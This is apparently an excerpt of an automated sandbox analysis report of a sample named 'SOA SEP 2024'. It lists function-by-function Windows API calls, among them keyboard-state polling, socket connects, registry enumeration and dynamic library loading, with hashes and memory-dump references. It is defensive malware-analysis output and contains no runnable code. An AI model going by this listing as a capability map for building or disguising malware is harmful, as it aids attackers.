API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID: `~
API String ID: 1687444384-4191741149
Opcode ID: 9625df7edf43632afbcfdb7850612bd33557056ad63636b345a653e2c58336de
Instruction ID: d46fb1168ff85ad07a85a29eecf68a8b0a33ac9e21f4f228e02b4f768bffe234
Opcode Fuzzy Hash: 9625df7edf43632afbcfdb7850612bd33557056ad63636b345a653e2c58336de
Instruction Fuzzy Hash: 5F01C4B1445B00EFD720EF75C909749BBF4FF00320F20880EE496976A0CBB8A680CB11

Function 007C1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007C19F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 007C1A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007C1B49
CloseHandle.KERNEL32(?), ref: 007C1BBF

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 07db8c9bd194401f482d9f1bf9a7adc7495cf2f27b0e1dd8aae234ab639ea770
Instruction ID: d7efe62847fbeaa627c0c5dd98062af1b8a063dc67c2d84b7ed009c6d0a2e39b
Opcode Fuzzy Hash: 07db8c9bd194401f482d9f1bf9a7adc7495cf2f27b0e1dd8aae234ab639ea770
Instruction Fuzzy Hash: C28171B0600204EBDF119F64C89ABADBBE5EF09710F14C459F919AF392D7B8AD418B90

Function 007CE062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007CE1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 007CE20D
IsDlgButtonChecked.USER32(?,00000001), ref: 007CE248
GetWindowLongW.USER32(?,000000EC), ref: 007CE269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007CE281

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: 9802c179feb65f50581795ad626f962066e2e52086b284eff4635c5802652d0f
Instruction ID: 1f697f3d85ae035592018e6188bf3315d189238ff03526dcd623c26a2f96ee5b
Opcode Fuzzy Hash: 9802c179feb65f50581795ad626f962066e2e52086b284eff4635c5802652d0f
Instruction Fuzzy Hash: AE61B174A00248AFDB21CF58C895FAE77BAFB59300F18805DF99997391C778AD90CB50

Function 007A1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007A1CB4
VariantClear.OLEAUT32(00000013), ref: 007A1D26
VariantClear.OLEAUT32(00000000), ref: 007A1D81
VariantClear.OLEAUT32(?), ref: 007A1DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007A1E26

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 23c17bfd21d9718f496faae0fc89d99d612d3461f825ee3f41b69bd8ccdfbd2f
Instruction ID: 4dee1b741fff09fa27ff0747591e87237e0ee5a0f6203a8f5378068107d45ea5
Opcode Fuzzy Hash: 23c17bfd21d9718f496faae0fc89d99d612d3461f825ee3f41b69bd8ccdfbd2f
Instruction Fuzzy Hash: BC5156B5A00249AFDB14CF58C884AAAB7B8FF8D314F158559ED59DB344E334EA11CBA0

Function 007C0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0076936C: __swprintf.LIBCMT ref: 007693AB
Part of subcall function 0076936C: __itow.LIBCMT ref: 007693DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 007C06EE
GetProcAddress.KERNEL32(00000000,?), ref: 007C077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 007C079B
GetProcAddress.KERNEL32(00000000,?), ref: 007C07E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 007C07FB

Part of subcall function 0077E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007AA574,?,?,00000000,00000008), ref: 0077E675
Part of subcall function 0077E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007AA574,?,?,00000000,00000008), ref: 0077E699

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 72458d2011af24836a9b7d888a09eb2def384ee09d90244feb542f8a78468c42
Instruction ID: fcbb0a89a92f85c7c98ef609fe6c5b9b9e2bf32259b4e67cb5ece729c152721a
Opcode Fuzzy Hash: 72458d2011af24836a9b7d888a09eb2def384ee09d90244feb542f8a78468c42
Instruction Fuzzy Hash: CB514875A00209DFCF14EFA8C495EADB7B5BF48310B05C059EA1AAB352DB38ED45CB80

Function 007C2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2BB5,?,?), ref: 007C3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C2EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C2F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007C2F75
RegCloseKey.ADVAPI32(?,?), ref: 007C2FA1
RegCloseKey.ADVAPI32(00000000), ref: 007C2FAE

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: cf03c8f5a5312dc3608bc9b7ed9b715d34a30cdfcf528f08df3fe4dd1864af98
Instruction ID: ed81d0c700b61bdeae9105b3dcd6ae5a692dfa5e73f8071993a976313053651c
Opcode Fuzzy Hash: cf03c8f5a5312dc3608bc9b7ed9b715d34a30cdfcf528f08df3fe4dd1864af98
Instruction Fuzzy Hash: 6E515871608204EFC715EB64C885F6AB7F9BF88304F04891DF9969B292DB78E905CB52

Function 007CCCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b4a03968884529b2181eaf5756360ea4999019eeeeb373a68d809a18fb2869e
Instruction ID: 845cf11f3d556d7c205a12b6b3f5709e6f809bbacb5747109aa5aff3193a760c
Opcode Fuzzy Hash: 5b4a03968884529b2181eaf5756360ea4999019eeeeb373a68d809a18fb2869e
Instruction Fuzzy Hash: 6541C739A01244AFCB22DF68CC48FA97B68FB0A350F19416DF95EA72D1C738AD51D790

Function 007B1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007B12B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007B12DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007B131C

Part of subcall function 0076936C: __swprintf.LIBCMT ref: 007693AB
Part of subcall function 0076936C: __itow.LIBCMT ref: 007693DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007B1341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007B1349

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: f9af14aa0c00a887946e2a8a71fa09201ca842ee1b927ab4d4c536a4ebb4ef15
Instruction ID: 9684799fe92b41e79fe6368af0c35b8f7d8b4efe21d4f3c09e84fa90eeff9d4c
Opcode Fuzzy Hash: f9af14aa0c00a887946e2a8a71fa09201ca842ee1b927ab4d4c536a4ebb4ef15
Instruction Fuzzy Hash: E2410A35A00105DFDF01EF64C995AAEBBF9FF48310B148099E90AAB362DB39ED01DB54

Function 0077B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0077B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0077B66C
GetAsyncKeyState.USER32(00000001), ref: 0077B691
GetAsyncKeyState.USER32(00000002), ref: 0077B69F

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: ffe1f88667d4f710cf7456025d9eca79e88142710729a0464ae1688181c47bb7
Instruction ID: a83e70c989830059f3f1161ded62ab33e583cf3ce456d639fbd145296c1387b8
Opcode Fuzzy Hash: ffe1f88667d4f710cf7456025d9eca79e88142710729a0464ae1688181c47bb7
Instruction Fuzzy Hash: 69416E35504115FFCF259F64C848BE9BB74FB09364F20831AE829D6290CB38AD94DFA1

Function 0079B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0079B369
PostMessageW.USER32(?,00000201,00000001), ref: 0079B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0079B41B
PostMessageW.USER32(?,00000202,00000000), ref: 0079B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0079B431

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 73df1d6821db860410670d00aed1de37d5c89883dc345c0e6b6c1843e59ad39f
Instruction ID: 1a1ee63c341e4324d912b859dcda0c98f1b5bd78b5af5e6768c4321acce464ad
Opcode Fuzzy Hash: 73df1d6821db860410670d00aed1de37d5c89883dc345c0e6b6c1843e59ad39f
Instruction Fuzzy Hash: 1E31DF7190025DEBDF14CFA8EE8DA9E3BB5EB04315F108229F821AB1D1C3B89D14DB90

Function 0079DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0079DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0079DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0079DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0079DC52
_wcsstr.LIBCMT ref: 0079DC5C

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: d5f20462818e1ceced82335f5c30ad3ee24add061c3ffc908124c7b5d4560b69
Instruction ID: 3d2b7d168ff434fee14d5658e3145ac6e844d1451dff7f73040ae40100faf93c
Opcode Fuzzy Hash: d5f20462818e1ceced82335f5c30ad3ee24add061c3ffc908124c7b5d4560b69
Instruction Fuzzy Hash: C221F572204140BFEF259F39ED49E7B7BA8DF4A750F108029F809CA191EAA9DC0192A0

Function 0079BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0079BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0079BCC2
__itow.LIBCMT ref: 0079BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0079BD00
__itow.LIBCMT ref: 0079BD11

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 10a4b8777a75c6957bf65f90d10e016d3912e1dcdb77142b9649131734879ebf
Instruction ID: 2fbe8331d98dfaa12d380e81d410e4a2e8e5c1af3f3c404ef8212e755cafb5f6
Opcode Fuzzy Hash: 10a4b8777a75c6957bf65f90d10e016d3912e1dcdb77142b9649131734879ebf
Instruction Fuzzy Hash: AB21DB35700218BBDF20AE65BD8AFDE7A69EF4A750F004064F906EB181DB788D4587F1

Function 007A6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 007650E6: _wcsncpy.LIBCMT ref: 007650FA

GetFileAttributesW.KERNEL32(?,?,?,?,007A60C3), ref: 007A6369
GetLastError.KERNEL32(?,?,?,007A60C3), ref: 007A6374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007A60C3), ref: 007A6388
_wcsrchr.LIBCMT ref: 007A63AA

Part of subcall function 007A6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007A60C3), ref: 007A63E0

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 8f6448aae1ec33cf9eed547293e0973c8bac6765e1ccf1fcdfdeae62eecc91bf
Instruction ID: 69d35b4bb68e832889d67365e3d559346745b9da9959eff9137880f559d131b6
Opcode Fuzzy Hash: 8f6448aae1ec33cf9eed547293e0973c8bac6765e1ccf1fcdfdeae62eecc91bf
Instruction Fuzzy Hash: 19212B31505215DBDF25AB749C56FEA33ACEF4B3A0F184565F105C70C0EB6CDD828A65

Function 007B8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007BA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 007BA84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007B8BD3
WSAGetLastError.WSOCK32(00000000), ref: 007B8BE2
connect.WSOCK32(00000000,?,00000010), ref: 007B8BFE

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 403f7229a03a20f752c421aeaf9912bec66d3490b5aa7f53844f3e5cd389dc42
Instruction ID: df7395aa19c07cae333020aafbe7f2726791cf898dffb487b8e9284b21bd09c6
Opcode Fuzzy Hash: 403f7229a03a20f752c421aeaf9912bec66d3490b5aa7f53844f3e5cd389dc42
Instruction Fuzzy Hash: 1F2181712002149FDB21AF68C989FBE77ADEF48750F048559F916AB292CB78AC018761

Function 007B8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 007B8441
GetForegroundWindow.USER32 ref: 007B8458
GetDC.USER32(00000000), ref: 007B8494
GetPixel.GDI32(00000000,?,00000003), ref: 007B84A0
ReleaseDC.USER32(00000000,00000003), ref: 007B84DB

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: ba4f452eb5a5245bbe69d56b716ab427c4715d293c68a1794fefbe56161aee15
Instruction ID: fe06b7a006c238f9c38435256df5548f1564d4cae7618e05d7d44e368eda8d6c
Opcode Fuzzy Hash: ba4f452eb5a5245bbe69d56b716ab427c4715d293c68a1794fefbe56161aee15
Instruction Fuzzy Hash: C8218475A00204EFDB10DFA4C989A9EB7E9EF48341F04C479E85A9B252DB78AD04CB60

Function 0077AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0077AFE3
SelectObject.GDI32(?,00000000), ref: 0077AFF2
BeginPath.GDI32(?), ref: 0077B009
SelectObject.GDI32(?,00000000), ref: 0077B033

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 828bd0e3d4c60e0fc640cf8af7173f0824568e06726507a012a8f7053d602dbb
Instruction ID: 7fddc31f7d74aa1181d3e3b028ee641410e3724dfea89c5844ee310ce7d160c3
Opcode Fuzzy Hash: 828bd0e3d4c60e0fc640cf8af7173f0824568e06726507a012a8f7053d602dbb
Instruction Fuzzy Hash: F6219070801349EFDF319F54EC88BAE7B69BB34395F24C21AE425961A0D3788846CB91

Function 0078217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 007821A9
CreateThread.KERNEL32(?,?,007822DF,00000000,?,?), ref: 007821ED
GetLastError.KERNEL32 ref: 007821F7
_free.LIBCMT ref: 00782200
__dosmaperr.LIBCMT ref: 0078220B

Part of subcall function 00787C0E: __getptd_noexit.LIBCMT ref: 00787C0E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: eb37194f6c207e8a4b23359e25136c0005a41a8df05be5250c2caef030bfe58c
Instruction ID: d9dea0959aba0ad9ccd0d13e69ff3e46038efceb5a907547686bb9a09850347c
Opcode Fuzzy Hash: eb37194f6c207e8a4b23359e25136c0005a41a8df05be5250c2caef030bfe58c
Instruction Fuzzy Hash: 0D112B33284346EFDB25BF65DC49D5B3B98FF04771B200029F92586192EB79D812C7A1

Function 0079ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0079ABD7
GetLastError.KERNEL32(?,0079A69F,?,?,?), ref: 0079ABE1
GetProcessHeap.KERNEL32(00000008,?,?,0079A69F,?,?,?), ref: 0079ABF0
HeapAlloc.KERNEL32(00000000,?,0079A69F,?,?,?), ref: 0079ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0079AC0E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: ee3dbf24f71b30afa92da33a463b5661ced758a8fb7cba736fc4149d00dec162
Instruction ID: 5773e70d083181c2f08d4cad0540b39d3af256f6006054089e9e9ead3f674839
